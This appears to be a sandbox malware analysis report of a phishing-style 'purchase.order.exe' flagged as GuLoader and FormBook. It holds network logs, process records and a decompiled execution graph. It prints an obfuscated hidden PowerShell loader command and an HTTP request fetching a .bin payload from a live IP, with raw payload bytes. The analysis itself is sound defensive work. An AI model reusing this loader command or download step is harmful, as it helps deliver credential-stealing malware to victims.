                                        Dec 10, 2024 14:09:53.645117044 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.645174026 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.645308971 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.645452976 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.647142887 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.647151947 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.647320986 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.649013996 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.649077892 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.649086952 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.649136066 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.650775909 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.650856972 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.650923014 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.652682066 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.653099060 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.653158903 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.654700041 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.654742002 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.654814005 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.656219006 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.656286001 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.656299114 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.656354904 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.658018112 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.658073902 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.658127069 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.659799099 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.660113096 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.660156965 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.661561012 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.661725998 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.661775112 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.663408995 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.663415909 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.663472891 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.665273905 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.665281057 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.665338039 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.667808056 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.667814970 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.667870045 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.669195890 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.669203043 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.669258118 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.670248032 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.670327902 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.670665979 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.671428919 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.671865940 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.671919107 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.672027111 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.672068119 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.673280001 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.673348904 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.673379898 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.675287008 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.675293922 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.675340891 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.676520109 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.676526070 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.676584959 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:10:14.624515057 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        • 212.162.149.66
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.10 | 49707 | 212.162.149.66 | 80 | 6888 | C:\Users\user\AppData\Local\Temp\Fathoming.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 10, 2024 14:09:51.673574924 CET | 193 | OUT | GET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                        Host: 212.162.149.66
                                        Cache-Control: no-cache
                                        Dec 10, 2024 14:09:52.971339941 CET | 1236 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Tue, 10 Dec 2024 08:23:46 GMT
                                        Accept-Ranges: bytes
                                        ETag: "b31f3d4dc4adb1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Tue, 10 Dec 2024 13:09:54 GMT
                                        Content-Length: 287808
                                        Data Raw: 14 f0 a5 38 b6 42 d8 5a 66 3e e7 98 5d 2c c0 b8 6b 5a 96 28 3b f5 b2 04 78 44 49 bb 42 d5 6b 19 63 94 73 32 de d0 e4 ca b7 b2 03 b9 e3 35 a9 eb b6 c4 50 14 8d 9b a4 8f 19 bc 94 10 9f b4 59 f0 0b d0 ad 6e 32 b7 80 02 3c 53 a5 ed de 9a d1 27 be 7f ed 83 74 6d d2 dd 81 d6 44 a3 77 dc b7 44 7d 82 45 9e 26 2a d0 17 83 ea d1 af 35 ec 74 e0 71 b3 49 a5 4b 87 ea b3 23 28 d1 61 ae 80 61 9b c5 90 53 67 ab 50 c4 05 09 a7 a0 f1 47 69 cc 0b dc c9 e1 0a 3c 3d c2 38 aa a4 00 71 2f c7 5c e5 40 2f 64 7d 12 2c f2 16 9f e7 6e 49 41 07 c9 9d 23 49 b4 4e 21 1d c3 61 a9 b8 32 7b ad 48 de 51 97 6f 7b e0 1d 78 12 5a 49 67 67 dc 24 8c 7c 87 ea 5e c4 1e 53 b8 4d 42 7a bd eb d0 46 af 46 ba 6f 36 13 a7 5c 59 0c 0f 88 12 42 97 47 26 cf 65 b0 19 40 97 53 4b c1 df 00 22 1e 7f 39 70 4d 17 41 7a 64 6a 42 9e 79 67 f6 83 6f e0 40 0b 2e d6 33 51 05 47 5e 97 80 3d 3e aa 2b 00 f2 d6 a7 f2 3e c2 96 73 21 c5 3b a7 e8 86 75 ec e9 ba 9b a1 86 46 d3 b6 ed 34 f7 c0 3a ce d9 88 db ff 65 b2 eb 73 fc 56 d9 a3 78 99 f1 51 11 69 d5 f5 fc 89 ac bc [TRUNCATED]
                                        Data Ascii: 8BZf>],kZ(;xDIBkcs25PYn2<S'tmDwD}E&*5tqIK#(aaSgPGi<=8q/\@/d},nIA#IN!a2{HQo{xZIgg$|^SMBzFFo6\YBG&e@SK"9pMAzdjBygo@.3QG^=>+>s!;uF4:esVxQi\nX5suzhU*9+U[LCY{@Rd7h{Q+RKvZf%7!/`L[s7g&${c05;UC^bx'dG\1Ce*EJ6jT/qF?Rh#*/<7]J0=l3(:Hz(Zr>HN2Qp0$"Vl5!7LTK -f(6eWw]V_Z5#YBCp`;?2@bbzJeXj05|yhHD{Q= 2n:gFdlOe}r`(L<5zS^O@\QY2dDaya#Y2>}IQk?Q8v3WE&)%":fL3@lc5CgzP%O[Tx}V.a&7V|%<N"SP@3yW3Gh'CGw`7|`Yp'Q?(q
                                        Dec 10, 2024 14:09:52.971940994 CET | 1236 | IN | Data Raw: c0 69 61 9b 9d bf fc be bb 89 48 ba 12 09 b9 de a0 ae 06 70 98 ea a8 9f 8f a8 95 d1 c0 7d 1c 41 03 37 7b 03 bb 6a 79 69 33 29 3e 46 70 12 df 93 9a 99 39 8e d3 89 65 eb 62 2b 8d aa 99 fe e2 3f 46 28 48 74 1f 9e ea 92 38 dc 26 e2 b5 3b 3a ba 66 ba
                                        Data Ascii: iaHp}A7{jyi3)>Fp9eb+?F(Ht8&;:fR[#V)u {`bX^RC1pj6X-xURGorJlWF,{gSz&`)eL_fqZ'&ld#xkgRBs$YN1aOSqT
                                        Dec 10, 2024 14:09:52.971949100 CET | 448 | IN | Data Raw: 04 7a a5 a2 be 1f 53 a5 5e 4f b2 40 c8 cb eb de 5c 51 90 8b 59 32 fc ac 64 d4 44 b4 ca 90 de 61 0e ae f0 eb f5 79 de 61 02 bd 23 59 c0 9f 9a 13 f0 93 f9 04 32 3e 7d 99 fd 49 11 99 51 6b 10 02 15 3f 99 ad b2 12 ef cf 51 38 e6 95 a6 76 09 7f c0 00
                                        Data Ascii: zS^O@\QY2dDaya#Y2>}IQk?Q8v3WE&)%":fL3@lc5CgzP%O[Tx}V.a&7V|%<N"SP@3yW3Gh'CGw`7|`Yp'Q?(qiaHp
                                        Dec 10, 2024 14:09:52.971956968 CET | 1236 | IN | Data Raw: d5 e5 a9 80 85 61 f4 06 4f 53 eb 71 54 00 17 b0 ff 67 b0 f2 e2 33 eb 24 57 13 0c 1d 21 3f 3f 6b 22 61 c8 3a ad 17 01 8e 74 f2 fc c9 37 1a 4f e9 6c 49 9b 07 bf ae 5b a5 68 ef c5 8a 72 64 97 80 b2 b1 93 dd 9e 26 5f 83 38 0b 27 80 d6 68 40 4d 9b 3a
                                        Data Ascii: aOSqTg3$W!??k"a:t7OlI[hrd&_8'h@M:p#o(JfHRCY98iJpu'f;P{E%D9g\|F84X{j"Ro,z+;m4CS{W%v(JZ_/DuL8Lph
                                        Dec 10, 2024 14:09:52.972007990 CET | 1236 | IN | Data Raw: fc be bb 89 48 ba 12 09 b9 de a0 ae 06 70 98 ea a8 9f 8f a8 95 d1 c0 7d 1c 41 03 37 7b 03 bb 6a 79 69 33 29 3e 46 70 12 df 93 9a 99 39 8e d3 89 65 eb 62 2b 8d aa 99 fe e2 3f 46 28 48 74 1f 9e ea 92 38 dc 26 e2 b5 3b 3a ba 66 ba 94 f1 0e 03 52 e5
                                        Data Ascii: Hp}A7{jyi3)>Fp9eb+?F(Ht8&;:fR[#V)u {`bX^RC1pj6X-xURGorJlWF,{gSz&`)eL_fqZ'&ld#xkgRBs$YN1aOSqTg3
                                        Dec 10, 2024 14:09:52.972042084 CET | 448 | IN | Data Raw: 26 a7 5d b9 33 be 38 ed eb de 20 8d 1b ce 55 c1 f3 d2 21 0c 22 bb 1c 90 2d 6e 70 eb 10 8d fa af 9e 69 f1 b2 5d 1c 28 c0 fc 1c 26 d3 e9 f7 3d 40 38 69 a3 2f 1e 4f 11 73 4b 89 f0 62 5a 16 c5 36 ef cf e9 45 85 4f a2 81 e2 be 3a 02 6b a5 f2 56 88 8a
                                        Data Ascii: &]38 U!"-npi](&=@8i/OsKbZ6EO:kV2?O6#%eo$8l}VDFl}.)r*ynCA#g{w-hF1%p9ro%Vtq1'~8o6?Z}wE1U#\
                                        Dec 10, 2024 14:09:52.973244905 CET | 1236 | IN | Data Raw: f4 be 5a 51 a6 50 a3 ef d6 4a fa ec 4a 33 0d 2c e8 de 22 fe b5 c3 31 3f 3f 80 24 ec 53 3a ad 17 01 36 3f c6 8c 42 c0 f3 4c 38 ad b3 9c 8c 75 6f b2 ba 6b 25 b0 61 ff 21 37 d0 3f 34 ff 22 61 d9 0f 6b 63 1c 27 80 55 ac 48 f5 55 45 70 23 6d aa c3 bc
                                        Data Ascii: ZQPJJ3,"1??$S:6?BL8uok%a!7?4"akc'UHUEp#mn&6]o9Y`I~8iJ2u~)>,5.9w^8"#I87>@J5U=,:+X'IM`b
                                        Dec 10, 2024 14:09:52.973633051 CET | 1236 | IN | Data Raw: b3 76 b9 de dc 59 87 8a 75 e9 a8 9f f2 86 2b 3d c3 7d 1c 6a f1 8f 5e 4a 29 4e 8e 8f 18 db ef a8 73 e0 54 c6 66 58 d7 8c 50 4b 62 66 66 de 8d aa 99 fe c9 f9 cd 5d b0 77 cf 17 bf 6e bd 15 52 f7 0d 9a 9a 1a c6 4d 7d f2 df c2 a8 e3 5a 50 3b e6 44 ee
                                        Data Ascii: vYu+=}j^J)NsTfXPKbff]wnRM}ZP;DZ&u]iX"$4-UO\cC7;"I]0pdT}d/0V#-JIK"ckx&l7tNWg\\e?nIO(f$WY
                                        Dec 10, 2024 14:09:52.973639965 CET | 1236 | IN | Data Raw: 09 31 ee 55 96 90 79 94 5a f8 89 41 ed 99 98 3f 87 80 55 e0 2a ac f0 eb 0a a9 55 1c e2 d7 6d d4 45 b7 65 ec 0f c3 ae ec 2f 30 7d 99 76 1c 01 aa a7 e8 d4 0e 2c 8d a9 af b2 12 99 82 da ba d2 96 a6 76 4f f5 80 03 d0 3b 0d 42 1c 0b dc 97 d2 90 e7 e1
                                        Data Ascii: 1UyZA?U*UmEe/0}v,vO;B{+9vndN$-RO3h^bYOk[EF8V.oSJm{ud-h=G3G23G~B0o`$' C'zg(EhHCCg>{jW
                                        Dec 10, 2024 14:09:52.973645926 CET | 1236 | IN | Data Raw: 6c be 6f 2a f6 90 fe e2 f9 8b bf e9 0e 03 7f a3 80 08 0e 0b 71 25 4b 18 61 87 b0 3b 7e 75 14 32 39 e8 3c da b3 6c 33 1f 27 e4 52 47 15 bd a0 94 f7 ed 35 d7 ec 26 6e 13 1d 79 2f a5 0f ae f7 0c c1 8a 34 d0 ee 66 f8 cd 6f fb bf 81 60 92 a3 f4 a4 5f
                                        Data Ascii: lo*q%Ka;~u29<l3'RG5&ny/4fo`_G]WY9|#,qqOzof?}.DaOvse-y}Zd~5&6+zKw_';9da"A3Bt9w{OY.]eEC*6CRRUreou
                                        Dec 10, 2024 14:09:53.127928972 CET | 1236 | IN | Data Raw: a4 d3 ce c0 0a a9 58 42 4f 50 25 05 94 85 73 75 75 61 77 5c cf 0e f0 59 74 30 19 e1 17 05 b8 49 91 6c 30 37 a5 7d 24 39 fa dd a3 68 85 1d a8 07 ab f7 a9 59 00 9c 59 46 ae de 97 96 b6 85 39 18 67 3e 1b c5 d4 37 cd 68 17 a0 4b 36 14 e2 75 6f ad 48
                                        Data Ascii: XBOP%suuaw\Yt0Il07}$9hYYF9g>7hK6uoHrb/96EHy2rT_FsD'\96nO!9]iD%{ToDLEj4/0P#ZOk0U=l`(LL


                                        Target ID:0
                                        Start time:08:07:35
                                        Start date:10/12/2024
                                        Path:C:\Users\user\Desktop\purchase.order.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\purchase.order.exe"
                                        Imagebase:0x400000
                                        File size:801'068 bytes
                                        MD5 hash:8125E510DF447B0EAD0E263D006A253E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:08:07:36
                                        Start date:10/12/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
                                        Imagebase:0xd40000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:08:07:36
                                        Start date:10/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:08:09:36
                                        Start date:10/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\Fathoming.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\Fathoming.exe"
                                        Imagebase:0x400000
                                        File size:801'068 bytes
                                        MD5 hash:8125E510DF447B0EAD0E263D006A253E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 18%, ReversingLabs
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:19.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:17.4%
                                          Total number of Nodes:1341
                                          Total number of Limit Nodes:24
                                          execution_graph 3200 401bc0 3201 401c11 3200->3201 3202 401bcd 3200->3202 3204 401c16 3201->3204 3205 401c3b GlobalAlloc 3201->3205 3203 4023af 3202->3203 3208 401be4 3202->3208 3207 40657e 21 API calls 3203->3207 3213 401c56 3204->3213 3238 406541 lstrcpynW 3204->3238 3219 40657e 3205->3219 3211 4023bc 3207->3211 3236 406541 lstrcpynW 3208->3236 3210 401c28 GlobalFree 3210->3213 3239 405ba1 3211->3239 3215 401bf3 3237 406541 lstrcpynW 3215->3237 3217 401c02 3243 406541 lstrcpynW 3217->3243 3234 406589 3219->3234 3220 4067d0 3221 4067e9 3220->3221 3266 406541 lstrcpynW 3220->3266 3221->3213 3223 4067a1 lstrlenW 3223->3234 3227 40669a GetSystemDirectoryW 3227->3234 3228 40657e 15 API calls 3228->3223 3229 4066b0 GetWindowsDirectoryW 3229->3234 3230 40657e 15 API calls 3230->3234 3231 406742 lstrcatW 3231->3234 3234->3220 3234->3223 3234->3227 3234->3228 3234->3229 3234->3230 3234->3231 3235 406712 SHGetPathFromIDListW CoTaskMemFree 3234->3235 3244 40640f 3234->3244 3249 406935 GetModuleHandleA 3234->3249 3255 4067ef 3234->3255 3264 406488 wsprintfW 3234->3264 3265 406541 lstrcpynW 3234->3265 3235->3234 3236->3215 3237->3217 3238->3210 3240 405bb6 3239->3240 3241 405c02 3240->3241 3242 405bca MessageBoxIndirectW 3240->3242 3241->3213 3242->3241 3243->3213 3267 4063ae 3244->3267 3247 406443 RegQueryValueExW RegCloseKey 3248 406473 3247->3248 3248->3234 3250 406951 3249->3250 3251 40695b GetProcAddress 3249->3251 3271 4068c5 GetSystemDirectoryW 3250->3271 3253 40696a 3251->3253 3253->3234 3254 406957 3254->3251 3254->3253 3261 4067fc 3255->3261 3256 406877 CharPrevW 3257 406872 3256->3257 3257->3256 3259 406898 3257->3259 3258 406865 CharNextW 3258->3257 3258->3261 3259->3234 3261->3257 3261->3258 3262 406851 CharNextW 3261->3262 3263 406860 CharNextW 3261->3263 3274 405e3d 3261->3274 3262->3261 3263->3258 3264->3234 3265->3234 3266->3221 3268 4063bd 3267->3268 3269 4063c1 3268->3269 3270 4063c6 RegOpenKeyExW 3268->3270 
3269->3247 3269->3248 3270->3269 3272 4068e7 wsprintfW LoadLibraryExW 3271->3272 3272->3254 3275 405e43 3274->3275 3276 405e59 3275->3276 3277 405e4a CharNextW 3275->3277 3276->3261 3277->3275 3278 403fc1 3279 403fd9 3278->3279 3280 40413a 3278->3280 3279->3280 3283 403fe5 3279->3283 3281 40418b 3280->3281 3282 40414b GetDlgItem GetDlgItem 3280->3282 3287 4041e5 3281->3287 3297 401389 2 API calls 3281->3297 3286 4044c0 22 API calls 3282->3286 3284 403ff0 SetWindowPos 3283->3284 3285 404003 3283->3285 3284->3285 3289 40400c ShowWindow 3285->3289 3290 40404e 3285->3290 3291 404175 SetClassLongW 3286->3291 3298 404135 3287->3298 3351 40450c 3287->3351 3292 404127 3289->3292 3293 40402c GetWindowLongW 3289->3293 3294 404056 DestroyWindow 3290->3294 3295 40406d 3290->3295 3296 40140b 2 API calls 3291->3296 3373 404527 3292->3373 3293->3292 3300 404045 ShowWindow 3293->3300 3301 404449 3294->3301 3302 404072 SetWindowLongW 3295->3302 3303 404083 3295->3303 3296->3281 3304 4041bd 3297->3304 3300->3290 3301->3298 3309 40447a ShowWindow 3301->3309 3302->3298 3303->3292 3307 40408f GetDlgItem 3303->3307 3304->3287 3308 4041c1 SendMessageW 3304->3308 3305 40140b 2 API calls 3320 4041f7 3305->3320 3306 40444b DestroyWindow EndDialog 3306->3301 3310 4040a0 SendMessageW IsWindowEnabled 3307->3310 3311 4040bd 3307->3311 3308->3298 3309->3298 3310->3298 3310->3311 3313 4040ca 3311->3313 3314 404111 SendMessageW 3311->3314 3315 4040dd 3311->3315 3324 4040c2 3311->3324 3312 40657e 21 API calls 3312->3320 3313->3314 3313->3324 3314->3292 3317 4040e5 3315->3317 3318 4040fa 3315->3318 3367 40140b 3317->3367 3322 40140b 2 API calls 3318->3322 3319 4040f8 3319->3292 3320->3298 3320->3305 3320->3306 3320->3312 3323 4044c0 22 API calls 3320->3323 3342 40438b DestroyWindow 3320->3342 3354 4044c0 3320->3354 3325 404101 3322->3325 3323->3320 3370 404499 3324->3370 3325->3292 3325->3324 3327 404272 GetDlgItem 3328 404287 3327->3328 3329 40428f ShowWindow KiUserCallbackDispatcher 3327->3329 
3328->3329 3357 4044e2 KiUserCallbackDispatcher 3329->3357 3331 4042b9 EnableWindow 3336 4042cd 3331->3336 3332 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3333 404302 SendMessageW 3332->3333 3332->3336 3333->3336 3336->3332 3358 4044f5 SendMessageW 3336->3358 3359 403fa2 3336->3359 3362 406541 lstrcpynW 3336->3362 3338 404331 lstrlenW 3339 40657e 21 API calls 3338->3339 3340 404347 SetWindowTextW 3339->3340 3363 401389 3340->3363 3342->3301 3343 4043a5 CreateDialogParamW 3342->3343 3343->3301 3344 4043d8 3343->3344 3345 4044c0 22 API calls 3344->3345 3346 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3345->3346 3347 401389 2 API calls 3346->3347 3348 404429 3347->3348 3348->3298 3349 404431 ShowWindow 3348->3349 3350 40450c SendMessageW 3349->3350 3350->3301 3352 404524 3351->3352 3353 404515 SendMessageW 3351->3353 3352->3320 3353->3352 3355 40657e 21 API calls 3354->3355 3356 4044cb SetDlgItemTextW 3355->3356 3356->3327 3357->3331 3358->3336 3360 40657e 21 API calls 3359->3360 3361 403fb0 SetWindowTextW 3360->3361 3361->3336 3362->3338 3365 401390 3363->3365 3364 4013fe 3364->3320 3365->3364 3366 4013cb MulDiv SendMessageW 3365->3366 3366->3365 3368 401389 2 API calls 3367->3368 3369 401420 3368->3369 3369->3324 3371 4044a0 3370->3371 3372 4044a6 SendMessageW 3370->3372 3371->3372 3372->3319 3374 4045ea 3373->3374 3375 40453f GetWindowLongW 3373->3375 3374->3298 3375->3374 3376 404554 3375->3376 3376->3374 3377 404581 GetSysColor 3376->3377 3378 404584 3376->3378 3377->3378 3379 404594 SetBkMode 3378->3379 3380 40458a SetTextColor 3378->3380 3381 4045b2 3379->3381 3382 4045ac GetSysColor 3379->3382 3380->3379 3383 4045b9 SetBkColor 3381->3383 3384 4045c3 3381->3384 3382->3381 3383->3384 3384->3374 3385 4045d6 DeleteObject 3384->3385 3386 4045dd CreateBrushIndirect 3384->3386 3385->3386 3386->3374 3991 402641 3992 402dcb 21 API calls 3991->3992 3993 402648 3992->3993 3996 406031 GetFileAttributesW CreateFileW 3993->3996 3995 402654 3996->3995 
4004 4025c3 4014 402e0b 4004->4014 4007 402da9 21 API calls 4008 4025d6 4007->4008 4009 4025f2 RegEnumKeyW 4008->4009 4010 4025fe RegEnumValueW 4008->4010 4012 402953 4008->4012 4011 402613 RegCloseKey 4009->4011 4010->4011 4011->4012 4015 402dcb 21 API calls 4014->4015 4016 402e22 4015->4016 4017 4063ae RegOpenKeyExW 4016->4017 4018 4025cd 4017->4018 4018->4007 3595 4015c8 3596 402dcb 21 API calls 3595->3596 3597 4015cf SetFileAttributesW 3596->3597 3598 4015e1 3597->3598 4019 402c48 InvalidateRect 4020 402c4f 4019->4020 3604 401fc9 3605 402dcb 21 API calls 3604->3605 3606 401fcf 3605->3606 3607 4055c6 28 API calls 3606->3607 3608 401fd9 3607->3608 3619 405b24 CreateProcessW 3608->3619 3611 402953 3614 401ff4 3615 402004 3614->3615 3616 401ff9 3614->3616 3618 402002 CloseHandle 3615->3618 3627 406488 wsprintfW 3616->3627 3618->3611 3620 401fdf 3619->3620 3621 405b57 CloseHandle 3619->3621 3620->3611 3620->3618 3622 4069e0 WaitForSingleObject 3620->3622 3621->3620 3623 4069fa 3622->3623 3624 406a0c GetExitCodeProcess 3623->3624 3628 406971 3623->3628 3624->3614 3627->3618 3629 40698e PeekMessageW 3628->3629 3630 406984 DispatchMessageW 3629->3630 3631 40699e WaitForSingleObject 3629->3631 3630->3629 3631->3623 4024 40204f 4025 402dcb 21 API calls 4024->4025 4026 402056 4025->4026 4027 406935 5 API calls 4026->4027 4028 402065 4027->4028 4029 402081 GlobalAlloc 4028->4029 4030 4020f1 4028->4030 4029->4030 4031 402095 4029->4031 4032 406935 5 API calls 4031->4032 4033 40209c 4032->4033 4034 406935 5 API calls 4033->4034 4035 4020a6 4034->4035 4035->4030 4039 406488 wsprintfW 4035->4039 4037 4020df 4040 406488 wsprintfW 4037->4040 4039->4037 4040->4030 4041 40254f 4042 402e0b 21 API calls 4041->4042 4043 402559 4042->4043 4044 402dcb 21 API calls 4043->4044 4045 402562 4044->4045 4046 40256d RegQueryValueExW 4045->4046 4051 402953 4045->4051 4047 402593 RegCloseKey 4046->4047 4048 40258d 4046->4048 4047->4051 4048->4047 4052 406488 wsprintfW 4048->4052 4052->4047 4053 
